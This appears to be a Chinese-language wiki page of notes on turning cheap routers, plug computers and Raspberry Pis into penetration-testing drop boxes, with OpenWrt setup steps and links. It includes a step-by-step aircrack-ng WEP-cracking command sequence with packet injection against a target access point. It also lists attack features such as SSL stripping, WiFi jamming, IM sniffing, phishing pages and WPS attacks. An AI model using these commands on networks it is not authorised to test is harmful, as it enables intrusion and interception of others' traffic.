F-Bomb

    內容表格
    沒有標頭

    版本為 07:32, 30 Nov 2024

    到這個版本。

    返回到 版本存檔.

    查閱目前版本

    http://opensource.com/life/12/1/linu...apest-15-cheap
    隨著開放式embedded hardware and sources code 增加,
    越來越多玩家,駭客編寫 專用於滲透測試硬體 連美國國防部都參一咖

    1.airmon-ng start wlan0  啟動wlan 0網卡

    2.aireplay-ng -3 -b AP的mac -h 客户端的mac mon0 (注入攻击)

    3.airodump-ng --ivs –w longas -c 2 mon0  (dump ivs key )
    -c 是接频道 -w ivs key存檔 是檔名

    4. aircrack-ng  longas 破 已存檔的ivs



    功能:
    1.ssh tunnel
    2.Wep 破解
    3.ssl 中間人攻擊 ssl strip
    4.wifi jammer
    5.IM sniffer
    6.Fake page 釣魚
    7.WPS 攻擊( reaver )
    8.xxxxx
    http://hi.baidu.com/f_fx/blog/item/c...f79f05556.html

    First mount an external filesystem, see Mounting Filesystems for help with that. Then edit /etc/opkg.conf:

    • Add the line dest usb /opt to the bottom of the file
    • Execute the following command (assuming that /mnt/sda1 is the path to the mount point of your external filesystem):
      ln -s /mnt/sda1 /opt
    • Edit /etc/profile and add the new mount point to your paths variables:
      export PATH=<current default path>:/opt/bin:/opt/sbin:/opt/usr/bin:/opt/usr/sbin
      export LD_LIBRARY_PATH=<current default LD library path>:/opt/lib:/opt/usr/lib

    http://wiki.openwrt.org/doc/uci/uhttpd
    http://forums.hak5.org/index.php?showtopic=23509


    vi /etc/config/uhttpd

    config uhttpd web

        list listen_http 0.0.0.0:88
        option home /www
        option index_page index.php
        list interpreter ".php=/usr/bin/php-cgi"

     

    vi /etc/php.ini
    date.timezone = "Asia/Shanghai"


    opkg   install netcat tar nmap tcpdump aircrack-ng kismet-client kismet-server perl dsniff nbtscan snort elinks yafc
        hostapd-utils at ngrep  php5 php5-cgi
    opkg -dest usb install tar
    opkg -dest usb install nmap
    opkg -dest usb install tcpdump
    opkg -dest usb install aircrack-ng
    opkg -dest usb install kismet-client
    opkg -dest usb install kismet-server
    opkg -dest usb install perl
    opkg -dest usb install dsniff
    opkg -dest usb install nbtscan
    opkg -dest usb install snort
    opkg -dest usb install karma  目前不能工作
    opkg -dest usb install elinks
    opkg -dest usb install yafc
    opkg -dest usb install hostapd-utils at ngrep
    opkg -dest usb install php5 php5-cgi

    exroot

    1 u盤格成ex4 我的事 sda1 先手動掛上后 鏡像/ 到u盤分區中
    mount /dev/sda1 /mnt
    mkdir /tmp/cproot
    mount --bind / /tmp/cproot
    tar -C /tmp/cproot -cvf - . | tar -C /mnt -xvf -
    sync
    umount /mnt
    umount /tmp/cproot

    2修改/etc/config/fstab
    config mount
            option target        /
            option device        /dev/sda1
            option fstype        ext4
            option options       rw,sync
            option enabled       1
            option enabled_fsck  0 
    3這是很關鍵的一步,因為沒有界面要通過命令完成
    /etc/init.d/fstab enable
    mv /etc/rc.d/S39usb /etc/rc.d/S19usb



    一.

    Tplink TL-WR703N (SOC:Atheros AR7240 CPU (400Mhz) 32 RAM ,4MB Nand Flash)
    Pineapple Firmware
    http://hakshop.myshopify.com/products/wifi-pineapple
    https://github.com/sebkinne/wifipineapple/
    http://www.pwnpi.com/category/pwn-pi-alternatives/
    http://www.minipwner.com/


    二.

    Plug Computer  建議買Pogo 最便宜 (SOC :Marvell Kirkwood 1.2GHz ,256MB DRAM ) NT 2000不到
    http://archlinuxarm.org/platforms/armv5/pogoplug-v2-pinkgray
    拆解 http://openpogo.tumblr.com/post/1320...he-pogoplug-v2
    http://www.irongeek.com/i.php?page=s...goplug-dropbox

    http://pwnieexpress.com/
    報導:http://www.informationsecurity.com.t....aspx?aid=6644
    http://bbs.btplug.cn/forum.php

    論壇
    http://www.westca.com/Forums/viewfor...=tchinese.html

    三.

    Raspberry  PI 用於愛與教育的 PI也可以做PWN.
    http://blog.pwnieexpress.com/post/24...-the-raspberry
    有二個不同專案
    http://sourceforge.net/projects/pwnpi/
    https://github.com/pwnieexpress/Raspberry-Pwn

    四.



    Pogoplug v3 (SOC:NAS7820 SoC PLX 7820 700MHz, 128MB RAM ,128MB Nand Flash +SD slot )
    http://archlinuxarm.org/platforms/armv6/pogoplug-provideov3
    Defense Advanced Research Projects Agency (美國國防部先進項目研究局)的 F-Bomb 計劃
    目前用此硬體+Battery +GPS


    簡報:http://www.scribd.com/doc/79682729/S...-ShmooCon-2012
    影片:http://www.youtube.com/watch?v=Vm_cH...ature=youtu.be

     

    五.

    MK802
    http://www.csksoft.net/blog/
    http://planet.enlightenment.org/
    http://rhombus-tech.net/allwinner_a10/orders/
    https://github.com/amery/linux-allwinner

    Powered by MindTouch Core